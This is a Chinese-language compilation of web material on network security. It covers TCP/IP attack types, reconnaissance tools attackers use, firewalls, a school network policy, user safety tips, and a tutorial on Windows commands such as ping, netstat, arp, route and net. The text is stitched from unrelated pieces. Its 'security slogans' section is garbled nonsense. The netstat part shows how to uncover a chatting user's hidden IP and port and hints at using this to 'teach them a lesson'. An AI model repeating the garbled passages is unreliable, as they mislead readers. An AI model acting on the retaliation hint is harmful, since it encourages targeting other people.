網路互聯設備的安全控制。對整個子網內的所有主機的傳輸信息和運行狀態進行安全監測和控制。主要通過網管軟體或路由器配置實現。
5、網路加密方式
鏈路加密方式
節點對節點加密方式
端對端加密方式
6、TCP/IP協議的安全問題
TCP/IP協議數據流採用明文傳輸。
源地址欺騙(Source address spoofing)或IP欺騙(IP spoofing)。 源路由選擇欺騙(Source Routing spoofing)。
路由選擇信息協議攻擊(RIP Attacks)。
鑒別攻擊(Authentication Attacks)。
TCP序列號欺騙(TCP Sequence number spoofing)。
TCP序列號轟炸攻擊(TCP SYN Flooding Attack),簡稱SYN攻擊。
易欺騙性(Ease of spoofing)。
7、網路安全工具
掃描器:是自動檢測遠程或本地主機安全性弱點的程序,一個好的掃描器相當於一千個口令的價值。
如何工作:TCP埠掃描器,選擇TCP/IP埠和服務(比如FTP),並記錄目標的回答,可收集關於目標主機的有用信息(是否可匿名登錄,是否提供某種服務)。掃描器告訴我們什麼:能發現目標主機的內在弱點,這些弱點可能是破壞目標主機的關鍵因素。系統管理員使用掃描器,有助於加強系統的安全性。黑客使用它,對網路的安全不利。
目前流行的掃描器:
(1)NSS網路安全掃描器。
(2)stroke超級優化TCP埠檢測程序,可記錄指定機器的所有開放埠。
(3)SATAN安全管理員的網路分析工具。
(4)JAKAL。
(5)XSCAN。
8、黑客常用的信息收集工具
信息收集是突破網路系統的第一步。黑客可以使用下面幾種工具來收集所需信息:
1、SNMP協議
SNMP協議,用來查閱非安全路由器的路由表,從而了解目標機構網路拓撲的內部細節。
簡單網路管理協議(Simple Network Management Protocol SNMP)首先是由Internet工程任務組織(Internet Engineering Task Force)(IETF)的研究幃組為了解決Internet上的路由器管理問題而提出的。SNMP被設計成與協議無關,所以它可以在IP,IPX,AppleTalk,OSI以及其他用到的傳輸協議上被使用。
2、TraceRoute程序
TraceRoute程序,得出到達目標主機所經過的網路數和路由器數。Traceroute程序是同Van Jacobson編寫的能深入探索TCPIP協議的方便可用的工具。它能讓我們看到數據報從一台主機傳到另一台主機所經過的路由。Traceroute程序還可以上我們使用IP源路由選項,讓源主機指定發送路由。
3、Whois協議
Whois協議,它是一種信息服務,能夠提供有關所有DNS域和負責各個域的系統管理員數據。(不過這些數據常常是過時的)。WHOIS協議。其基本內容是,先向伺服器的TCP埠43建立一個連接,發送查詢關鍵字並加上回車換行,然後接收伺服器的查詢結果。
4、DNS伺服器
DNS伺服器是Domain Name System或者Domain Name Service(域名系統或者域名服務)。域名系統為Internet上的主機分配域名地址和IP地址。用戶使用域名地址,該系統就會自動把域名地址轉為IP地址。域名服務是運行域名系統的Internet工具。執行域名服務的伺服器稱之為DNS伺服器,通過DNS伺服器來應答域名服務的查詢。
5、Finger協議
Finger協議,能夠提供特定主機上用戶們的詳細信息(注冊名、電話號碼、最後一次注冊的時間等)。
6、Ping實用程序
Ping實用程序,可以用來確定一個指定的主機的位置並確定其是否可達。把這個簡單的工具用在掃描程序中,可以Ping網路上每個可能的主機地址,從而可以構造出實際駐留在網路上的主機清單。它是用來檢查網路是否通暢或者網路連接速度的命令。作為一個生活在網路上的管理員或者黑客來說,ping命令是第一個必須掌握的DOS命令,它所利用的原理是這樣的:網路上的機器都有唯一確定的IP地址,我們給目標IP地址發送一個數據包,對方就要返回一個同樣大量的'數據包,根據返回的數據包我們可以確定目標主機的存在,可以初步判斷目標主機的操作系統等,當然,它也可用來測定連接速度和丟包率。
使用方法(XP系統下)
開始-運行-CMD-確定-輸入ping 0.0.0.0-回車 0.0.0.0為你需要的IP。
部分防火牆會對ping禁止,故可能會提示timed out(超時)等情況
判斷操作系統,則是看返回的TTL值。
9、 Internet防火牆
Internet防火牆是這樣的系統(或一組系統),它能增強機構內部網路的安全性。 防火牆系統決定了哪些內部服務可以被外界訪問;外界的哪些人可以訪問內部的哪些服務,以及哪些外部服務可以被內部人員訪問。要使一個防火牆有效,所有來自和去往Internet的信息都必須經過防火牆,接受防火牆的檢查。防火牆只允許授權的數據通過,並且防火牆本身也必須能夠免於滲透。
1、 Internet防火牆與安全策略的關系
防火牆不僅僅是路由器、堡壘主機、或任何提供網路安全的設備的組合,防火牆是安全策略的一個部分。
安全策略建立全方位的防禦體系,甚至包括:告訴用戶應有的責任,公司規定的網路訪問、服務訪問、本地和遠地的用戶認證、撥入和撥出、磁碟和數據加密、病毒防護措施,以及雇員培訓等。所有可能受到攻擊的地方都必須以同樣安全級別加以保護。
3、 Internet防火牆的作用
Internet防火牆允許網路管理員定義一個中心「 扼制點」 來防止非法用戶,比如防止黑客、網路破壞者等進入內部網路。禁止存在安全脆弱性的服務進出網路,並抗擊來自各種路線的攻擊。Internet防火牆能夠簡化安全管理,網路的安全性是在防火牆系統上得到加固,而不是分布在內部網路的所有主機上。
在防火牆上可以很方便的監視網路的安全性,並產生報警。(注意:對一個與Internet相聯的內部網路來說,重要的問題並不是網路是否會受到攻擊,而是何時受到攻擊?)網路管理員必須審計並記錄所有通過防火牆的重要信息。如果網路管理員不能及時響應報警並審查常規記錄,防火牆就形同虛設。在這種情況下,網路管理員永遠不會知道防火牆是否受到攻擊。
Internet防火牆可以作為部署NAT(Network Address Translator,網路地址變換)的邏輯地址。因此防火牆可以用來緩解地址空間短缺的問題,並消除機構在變換ISP時帶來的重新編址的麻煩。
Internet防火牆是審計和記錄Internet使用量的一個最佳地方。網路管理員可以在此向管理部門提供Internet連接的費用情況,查出潛在的帶寬瓶頸的位置,並根據機構的核算模式提供部門計費。
10、Internet安全隱患的主要體現
1. Internet是一個開放的、無控制機構的網路,黑客(Hacker)經常會侵入網路中的計算機系統,或竊取機密數據和盜用特權,或破壞重要數據,或使系統功能得不到充分發揮直至癱瘓。
2. Internet的數據傳輸是基於TCP/IP通信協議進行的,這些協議缺乏使傳輸過程中的信息不被竊取的安全措施。
3. Internet上的通信業務多數使用Unix操作系統來支持,Unix操作系統中明顯存在的安全脆弱性問題會直接影響安全服務。
4.在計算機上存儲、傳輸和處理的電子信息,還會有像傳統的郵件通信那樣進行信幣保護和簽字蓋章。信息的來源和去向是否真實,內容是否被改動,以及是否泄漏等,在應用支持的服務協議中是憑著君子協定來維系的。
5.電子郵件存在著被拆看、誤投和偽造的可能性。使用電子郵件來傳輸重要機密信息會存在著很大的危險。
6.計算機病毒通過Internet的傳播給上網用戶帶來極大的危害,病毒可以使計算機和計算機網路系統癱瘓、數據和文件丟失。在網路上傳播病毒可以通過公共匿名FTP文件傳送、也可以通過郵件和郵件的附加文件傳播。
網路安全制度
一、必須遵守《計算機信息網路國際聯網安全保護管理辦法》和《中華人民共和國計算機信息網路國際聯網管理暫行規定》以及其它相關法律、法規的規定。
二、學校網路中心必須採取各種技術及行政手段保證網路安全和信息安全。
三、網路中心的工作人員和用戶必須對所提供的信息負責。不得利用計算機聯網從事危害國家安全,泄露國家秘密等違法活動,不得製作、查閱、復制和傳播有礙社會治安和有傷風俗文化的信息。
四、不允許進行任何干擾網路用戶、破壞網路服務和破壞網路設備的活動。包括不許在網路上發布不真實的信息,不許散布計算機病毒,不許使用網路進入未經授權使用的計算機等。
五、學校應設立網路安全員,負責網路安全和信息安全工作。
六、網路中心應按照《計算機信息網路國際聯網安全保護管理辦法》定期對相應的網路用戶進行有關的網路安全和信息安全教育。
七、網路中心應根據國家有關規定對上網用戶進行審查。凡違反國家有關規定的信息嚴禁上網。
八、所有用戶有義務向網路安全員和有關部門報告違法犯罪行為和有害信息。
九、網路中心和用戶必須接受上級有關部門依法進行的監督檢查。對違反本管理辦法的個人,將對其進行警告,停止網路連接、上報學校等處理。
十、安裝正版殺毒軟體、防火牆,按時更新殺毒軟體、防火牆,定期殺毒,防範非法用戶入侵,防止計算機病毒入侵。
網路安全口號
1.質量是安全的基礎,安全是生產的前提
2.忽視有一段時間是痛苦的
3.生產繁忙而安全
4.小心點,沒什麼大錯誤,胡亂選角。
5.時刻注意安全,防止事故發生
6.粗心是事故的溫床。粗心是安全水道的礁石
7.魯莽是走向事故深淵的第一步
8.眼睛容不下一粒沙子。馬虎是安全的
9.雜草不清除弱苗隱患,效益難
10.成千上萬的產品堆積成山,火花源被摧毀
11.安全是增產的細胞隱患,是事故的胚胎
12.注重安全的果實,忽視安全的危害
13.鋒利的刀不用磨就會生銹,也不會安全地抓住任何錯誤
14.愉快地去工作,安全地回家
15.重量不足以按下安全帽救人
16.安全規章制度不離手
17.安全是一朵快樂的花。給家人澆水是一種獨特的方式
18.不要忘記危機,也不要忘記混亂
19.你必須努力工作以避免事故
20.入海前探風,上班前練習
網路安全知識
一、在使用電腦過程中應該採取哪些網路安全防範措施:
1、安裝防火牆和防病毒軟體,並經常升級;
2、注意經常給系統打補丁,堵塞軟體漏洞;
3、不要上一些不太了解的網站,不要執行從網上下載後未經殺毒處理的軟體,不要打開MSN或者QQ上傳送過來的不明文件等。
二、如何防範U盤、移動硬碟泄密:
1、及時查殺木馬與病毒;
2、從正規商家購買可移動存儲介質;
3、定期備份並加密重要數據;
4、不要將辦公與個人的可移動存儲介質混用。
三、如何將網頁瀏覽器配置得更安全:
1、設置統一、可信的瀏覽器初始頁面;
2、定期清理瀏覽器中本地緩存、歷史記錄以及臨時文件內容;
3、利用病毒防護軟體對所有下載資源及時進行惡意代碼掃描。
四、如何設置windows操作系統開機密碼:
按照先後順序,依次使用滑鼠點擊「開始」菜單中的「控制面板」下的「用戶賬戶」,選擇賬戶後點擊「創建密碼」,輸入兩遍密碼後按「創建密碼」按鈕即可。
五、為什麼要定期進行補丁升級:
編寫程序不可能十全十美,所以軟體也免不了會出現BUG,而補丁是專門用於修復這些BUG的。因為原來發布的軟體存在缺陷,發現之後另外編制一個小程序使其完善,這種小程序俗稱補丁。定期進行補丁升級,升級到最新的安全補丁,可以有效地防止非法入侵。
六、計算機中毒有哪些症狀:
1、經常死機;
2、文件打不開;
3、經常報告內存不夠;
4、提示硬碟空間不夠;
5、出現大量來歷不明的文件;
6、數據丟失;
7、系統運行速度變慢;
8、操作系統自動執行操作。
七、為什麼不要打開來歷不明的網頁、電子郵件鏈接或附件:
互聯網上充斥著各種釣魚網站、病毒、木馬程序。不明來歷的網頁、電子郵件鏈接、附件中,很可能隱藏著大量的病毒、木馬,一旦打開,這些病毒、木馬會自動進入電腦並隱藏在電腦中,會造成文件丟失損壞甚至導致系統癱瘓。
八、接入移動存儲設備(如移動硬碟和U盤)前為什麼要進行病毒掃描:
外接存儲設備也是信息存儲介質,所存的信息很容易帶有各種病毒,如果將帶有病毒的外接存儲介質接入電腦,很容易將病毒傳播到電腦中。
九、計算機日常使用中遇到的異常情況有哪些:
計算機出現故障可能是由計算機自身硬體故障、軟體故障、誤操作或病毒引起的,主要包括系統無法啟動、系統運行變慢、可執行程序文件大小改變等異常現象。
十、Cookies會導致怎樣的安全隱患:
當用戶訪問一個網站時,Cookies將自動儲存於用戶IE內,其中包含用戶訪問該網站的種種活動、個人資料、瀏覽習慣、消費習慣,甚至信用記錄等。這些信息用戶無法看到,當瀏覽器向此網址的其他主頁發出GET請求時,此Cookies信息也會隨之發送過去,這些信息可能被不法分子獲得。為保障個人隱私安全,可以在IE設置中對Cookies的使用做出限制。
6. dos有哪些網路命令功能是什麼越詳細越好。謝謝!
網路命令一覽表(絕對實用)
當你打開瀏覽器,自由地游弋於浩如煙海的互聯網世界之時,是否也沉迷於下載各種實用軟體?其中也許有很大一部分就是網路工具吧!但請你不要忽視你的面前——windows(包括win98和nt)作系統中本來就帶有不少的網路實用工具,雖然比較簡單,卻並不簡陋。本著「簡單就是美」的原則,下面就為你展現windows網路實用工具的豐采……
ping
ping是個使用頻率極高的實用程序,用於確定本地主機是否能與另一台主機交換(發送與接收)數據報。根據返回的信息,你就可以推斷tcp/ip參數是否設置得正確以及運行是否正常。需要注意的是:成功地與另一台主機進行一次或兩次數據報交換並不表示tcp/ip配置就是正確的,你必須執行大量的本地主機與遠程主機的數據報交換,才能確信tcp/ip的正確性。
簡單的說,ping就是一個測試程序,如果ping運行正確,你大體上就可以排除網路訪問層、網卡、modem的輸入輸出線路、電纜和路由器等存在的故障,從而減小了問題的范圍。但由於可以自定義所發數據報的大小及無休止的高速發送,ping也被某些別有用心的人作為ddos(拒絕服務攻擊)的工具,前段時間yahoo就是被黑客利用數百台可以高速接入互聯網的電腦連續發送大量ping數據報而癱瘓的。
按照預設設置,windows上運行的ping命令發送4個icmp(網間控制報文協議)回送請求,每個32位元組數據,如果一切正常,你應能得到4個回送應答。
ping能夠以毫秒為單位顯示發送回送請求到返回回送應答之間的時間量。如果應答時間短,表示數據報不必通過太多的路由器或網路連接速度比較快。ping還能顯示ttl(time to live存在時間)值,你可以通過ttl值推算一下數據包已經通過了多少個路由器:源地點ttl起始值(就是比返回ttl略大的一個2的乘方數)-返回時ttl值。例如,返回ttl值為119,那麼可以推算數據報離開源地址的ttl起始值為128,而源地點到目標地點要通過9個路由器網段(128-119);如果返回ttl值為246,ttl起始值就是256,源地點到目標地點要通過9個路由器網段。
通過ping檢測網路故障的典型次序
正常情況下,當你使用ping命令來查找問題所在或檢驗網路運行情況時,你需要使用許多ping命令,如果所有都運行正確,你就可以相信基本的連通性和配置參數沒有問題;如果某些ping命令出現運行故障,它也可以指明到何處去查找問題。下面就給出一個典型的檢測次序及對應的可能故障:
ping 127.0.0.1——這個ping命令被送到本地計算機的ip軟體,該命令永不退出該計算機。如果沒有做到這一點,就表示tcp/ip的安裝或運行存在某些最基本的問題。
ping 本機ip——這個命令被送到你計算機所配置的ip地址,你的計算機始終都應該對該ping命令作出應答,如果沒有,則表示本地配置或安裝存在問題。出現此問題時,區域網用戶請斷開網路電纜,然後重新發送該命令。如果網線斷開後本命令正確,則表示另一台計算機可能配置了相同的ip地址。
ping 區域網內其他ip——這個命令應該離開你的計算機,經過網卡及網路電纜到達其他計算機,再返回。收到回送應答表明本地網路中的網卡和載體運行正確。但如果收到0個回送應答,那麼表示子網掩碼(進行子網分割時,將ip地址的網路部分與主機部分分開的代碼)不正確或網卡配置錯誤或電纜系統有問題。
ping 網關ip——這個命令如果應答正確,表示區域網中的網關路由器正在運行並能夠作出應答。
ping 遠程ip——如果收到4個應答,表示成功的使用了預設網關。對於撥號上網用戶則表示能夠成功的訪問internet(但不排除isp的dns會有問題)。
ping localhost——localhost是個作系統的網路保留名,它是127.0.0.1的別名,每太計算機都應該能夠將該名字轉換成該地址。如果沒有做到這一帶內,則表示主機文件(/windows/host)中存在問題。
ping www.yahoo.com——對這個域名執行ping命令,你的計算機必須先將域名轉換成ip地址,通常是通過dns伺服器 如果這里出現故障,則表示dns伺服器的ip地址配置不正確或dns伺服器有故障(對於撥號上網用戶,某些isp已經不需要設置dns伺服器了)。順便說一句:你也可以利用該命令實現域名對ip地址的轉換功能。
如果上面所列出的所有ping命令都能正常運行,那麼你對你的計算機進行本地和遠程通信的功能基本上就可以放心了。但是,這些命令的成功並不表示你所有的網路配置都沒有問題,例如,某些子網掩碼錯誤就可能無法用這些方法檢測到。
ping命令的常用參數選項
ping ip -t——連續對ip地址執行ping命令,直到被用戶以ctrl+c中斷。
ping ip -l 2000——指定ping命令中的數據長度為2000位元組,而不是預設的32位元組。
ping ip -n——執行特定次數的ping命令。
netstat
netstat用於顯示與ip、tcp、udp和icmp協議相關的統計數據,一般用於檢驗本機各埠的網路連接情況。
如果你的計算機有時候接受到的數據報會導致出錯數據刪除或故障,你不必感到奇怪,tcp/ip可以容許這些類型的錯誤,並能夠自動重發數據報。但如果累計的出錯情況數目佔到所接收的ip數據報相當大的百分比,或者它的數目正迅速增加,那麼你就應該使用netstat查一查為什麼會出現這些情況了。
netstat的一些常用選項:
netstat -s——本選項能夠按照各個協議分別顯示其統計數據。如果你的應用程序(如web瀏覽器)運行速度比較慢,或者不能顯示web頁之類的數據,那麼你就可以用本選項來查看一下所顯示的信息。你需要仔細查看統計數據的各行,找到出錯的關鍵字,進而確定問題所在。
netstat -e——本選項用於顯示關於乙太網的統計數據。它列出的項目包括傳送的數據報的總位元組數、錯誤數、刪除數、數據報的數量和廣播的數量。這些統計數據既有發送的數據報數量,也有接收的數據報數量。這個選項可以用來統計一些基本的網路流量)。
netstat -r——本選項可以顯示關於路由表的信息,類似於後面所講使用route print命令時看到的 信息。除了顯示有效路由外,還顯示當前有效的連接。
netstat -a——本選項顯示一個所有的有效連接信息列表,包括已建立的連接(established),也包括監聽連接請求(listening)的那些連接。
netstat -n——顯示所有已建立的有效連接。
netstat的妙用
經常上網的人一般都使用icq的,不知道你有沒有被一些討厭的人騷擾得不敢上線,想投訴卻又不知從和下手?其實,你只要知道對方的ip,就可以向他所屬的isp投訴了。但怎樣才能通過icq知道對方的ip呢?如果對方在設置icq時選擇了不顯示ip地址,那你是無法在信息欄中看到的。其實,你只需要通過netstat就可以很方便的做到這一點:當他通過icq或其他的工具與你相連時(例如你給他發一條icq信息或他給你發一條信息),你立刻在dos prompt下輸入netstat -n或netstat -a就可以看到對方上網時所用的ip或isp域名了。甚至連所用port都完全暴露了,如果你想給他一些教訓,這些信息已經足夠……
ipconfig
ipconfig實用程序和它的等價圖形用戶界面——windows 95/98中的winipcfg可用於顯示當前的tcp/ip配置的設置值。這些信息一般用來檢驗人工配置的tcp/ip設置是否正確。但是,如果你的計算機和所在的區域網使用了動態主機配置協議(dynamic host configuration protocol,dhcp——windows nt下的一種把較少的ip地址分配給較多主機使用的協議,類似於撥號上網的動態ip分配),這個程序所顯示的信息也許更加實用。這時,ipconfig可以讓你了解你的計算機是否成功的租用到一個ip地址,如果租用到則可以了解它目前分配到的是什麼地址。了解計算機當前的ip地址、子網掩碼和預設網關實際上是進行測試和故障分析的必要項目。
最常用的選項:
ipconfig——當使用ipconfig時不帶任何參數選項,那麼它為每個已經配置了的介面顯示ip地址、子網掩碼和預設網關值
ipconfig /all——當使用all選項時,ipconfig能為dns和wins伺服器顯示它已配置且所要使用的附加信息(如ip地址等),並且顯示內置於本地網卡中的物理地址(mac)。如果ip地址是從dhcp伺服器租用的,ipconfig將顯示dhcp伺服器的ip地址和租用地址預計失效的日期(有關dhcp伺服器的相關內容請詳見其他有關nt伺服器的書籍或詢問你的網管),其輸出信息見圖6的下半部分。
ipconfig /release和ipconfig /renew——這是兩個附加選項,只能在向dhcp伺服器租用其ip地址的計算機上起作用。如果你輸入ipconfig /release,那麼所有介面的租用ip地址便重新交付給dhcp伺服器(歸還ip地址)。如果你輸入ipconfig /renew,那麼本地計算機便設法與dhcp伺服器取得聯系,並租用一個ip地址。請注意,大多數情況下網卡將被重新賦予和以前所賦予的相同的ip地址。
如果你使用的是windows 95/98,那麼你應該更習慣使用winipcfg而不是ipconfig,因為它是一個圖形用戶界面,而且所顯示的信息與ipconfig相同,並且也提供發布和更新動態ip地址的選項 如果你購買了windows nt resource kit(nt資源包),那麼windows nt也包含了一個圖形替代界面,該實用程序的名字是wntipcfg,和windows 95/98的winipcfg類似。
arp(地址轉換協議)
arp是一個重要的tcp/ip協議,並且用於確定對應ip地址的網卡物理地址。實用arp命令,你能夠查看本地計算機或另一台計算機的arp高速緩存中的當前內容。此外,使用arp命令,也可以用人工方式輸入靜態的網卡物理/ip地址對,你可能會使用這種方式為預設網關和本地伺服器等常用主機進行這項作,有助於減少網路上的信息量。
按照預設設置,arp高速緩存中的項目是動態的,每當發送一個指定地點的數據報且高速緩存中不存在當前項目時,arp便會自動添加該項目。一旦高速緩存的項目被輸入,它們就已經開始走向失效狀態。例如,在windows nt網路中,如果輸入項目後不進一步使用,物理/ip地址對就會在2至10分鍾內失效。因此,如果arp高速緩存中項目很少或根本沒有時,請不要奇怪,通過另一台計算機或路由器的ping命令即可添加。所以,需要通過arp命令查看高速緩存中的內容時,請最好先ping 此台計算機(不能是本機發送ping命令)。
常用命令選項:
arp -a或arp -g——用於查看高速緩存中的所有項目。-a和-g參數的結果是一樣的,多年來-g一直是unix平台上用來顯示arp高速緩存中所有項目的選項,而windows用的是arp -a(-a可被視為all,即全部的意思),但它也可以接受比較傳統的-g選項。
arp -a ip——如果你有多個網卡,那麼使用arp -a加上介面的ip地址,就可以只顯示與該介面相關的arp緩存項目。
arp -s ip 物理地址——你可以向arp高速緩存中人工輸入一個靜態項目。該項目在計算機引導過程中將保持有效狀態,或者在出現錯誤時,人工配置的物理地址將自動更新該項目。
arp -d ip——使用本命令能夠人工刪除一個靜態項目。
看到這里,你也許已經有些累了……其實對於一般用戶來說也已經足夠——你可以用ipconfig和ping命令來查看自己的網路配置並判斷是否正確、可以用netstat查看別人與你所建立的連接並找出icq使用者所隱藏的ip信息、可以用arp查看網卡的mac地址——這些已足已讓你丟掉菜鳥的頭銜。如果你並不滿足,那就「硬著頭皮」(下面的內容可能有些枯燥)繼續follow me……
tracert
當數據報從你的計算機經過多個網關傳送到目的地時,tracert命令可以用來跟蹤數據報使用的路由(路徑)。該實用程序跟蹤的路徑是源計算機到目的地的一條路徑,不能保證或認為數據報總遵循這個路徑。如果你的配置使用dns,那麼你常常會從所產生的應答中得到城市、地址和常見通信公司的名字。tracert是一個運行得比較慢的命令(如果你指定的目標地址比較遠),每個路由器你大約需要給它15秒鍾
tracert的使用很簡單,只需要在tracert後面跟一個ip地址或url,tracert會進行相應的域名轉換的。tracert一般用來檢測故障的位置,你可以用tracert ip在哪個環節上出了問題,雖然還是沒有確定是什麼問題,但它已經告訴了我們問題所在的地方,你也就可以很有把握的告訴別人——某某出了問題。
route
大多數主機一般都是駐留在只連接一台路由器的網段上。由於只有一台路由器,因此不存在使用哪一台路由器將數據報發表到遠程計算機上去的問題,該路由器的ip地址可作為該網段上所有計算機的預設網關來輸入。
但是,當網路上擁有兩個或多個路由器時,你就不一定想只依賴預設網關了。實際上你可能想讓你的某些遠程ip地址通過某個特定的路由器來傳遞,而其他的遠程ip則通過另一個路由器來傳遞。
在這種情況下,你需要相應的路由信息,這些信息儲存在路由表中,每個主機和每個路由器都配有自己獨一無二的路由表。大多數路由器使用專門的路由協議來交換和動態更新路由器之間的路由表。但在有些情況下,必須人工將項目添加到路由器和主機上的路由表中。route就是用來顯示、人工添加和修改路由表項目的。
一般使用選項:
route print——本命令用於顯示路由表中的當前項目,在單路由器網段上的輸出結果如圖12,由於用ip地址配置了網卡,因此所有的這些項目都是自動添加的。
route add——使用本命令,可以將信路由項目添加給路由表。例如,如果要設定一個到目的網路209.98.32.33的路由,其間要經過5個路由器網段,首先要經過本地網路上的一個路由器,器ip為202.96.123.5,子網掩碼為255.255.255.224,那麼你應該輸入以下命令:
route add 209.98.32.33 mask 255.255.255.224 202.96.123.5 metric 5
route change——你可以使用本命令來修改數據的傳輸路由,不過,你不能使用本命令來改變數據的目的地。下面這個例子可以將數據的路由改到另一個路由器,它採用一條包含3個網段的更直的路徑:
route add 209.98.32.33 mask 255.255.255.224 202.96.123.250 metric 3
route delete——使用本命令可以從路由表中刪除路由。例如:route delete 209.98.32.33
nbtstat
nbtstat(tcp/ip上的netbios統計數據)實用程序用於提供關於關於netbios的統計數據。運用netbios,你可以查看本地計算機或遠程計算機上的netbios名字表格。
常用選項:
nbtstat -n——顯示寄存在本地的名字和服務程序
nbtstat -c——本命令用於顯示netbios名字高速緩存的內容。netbios名字高速緩存用於寸放與本計算機最近進行通信的其他計算機的netbios名字和ip地址對。
nbtstat -r——本命令用於清除和重新載入netbios名字高速緩存。
nbtstat -a ip——通過ip顯示另一台計算機的物理地址和名字列表,你所顯示的內容就像對方計算機自己運行nbtstat -n一樣
nbtstat -s ip——顯示實用其ip地址的另一台計算機的netbios連接表。
net
net命令有很多函數用於實用和核查計算機之間的netbios連接。這里我只介紹最常用的兩個:net view和net use。
net view unc——運用此命令,你可以查看目標伺服器上的共享點名字。任何區域網里的人都可以發出此命令,而且不需要提供用戶id或口令。unc名字總是以\\開頭,後面跟隨目標計算機的名字。例如,net view \\lx就是查看主機名為lx的計算機的共享點(見圖15)。
net use 本地盤符 目標計算機共享點——本命令用於建立或取消到達特定共享點的映像驅動器的連接(如果需要,你必須提供用戶id或口令)。例如,你輸入net use f: \\lx\mp3就是將映像驅動器f:連接到\\lx\mp3共享點上,今後你直接訪問f:就可以訪問\\lx\mp3共享點,這和你右擊「我的電腦」選擇映射網路驅動器類似。